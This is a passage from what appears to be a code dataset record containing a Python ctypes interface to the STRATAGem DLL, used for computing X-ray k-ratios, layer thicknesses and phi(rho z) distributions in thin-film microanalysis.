self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-4": "<mask token>\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import atomic_mass_kg_mol, mass_density_kg_m3\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, 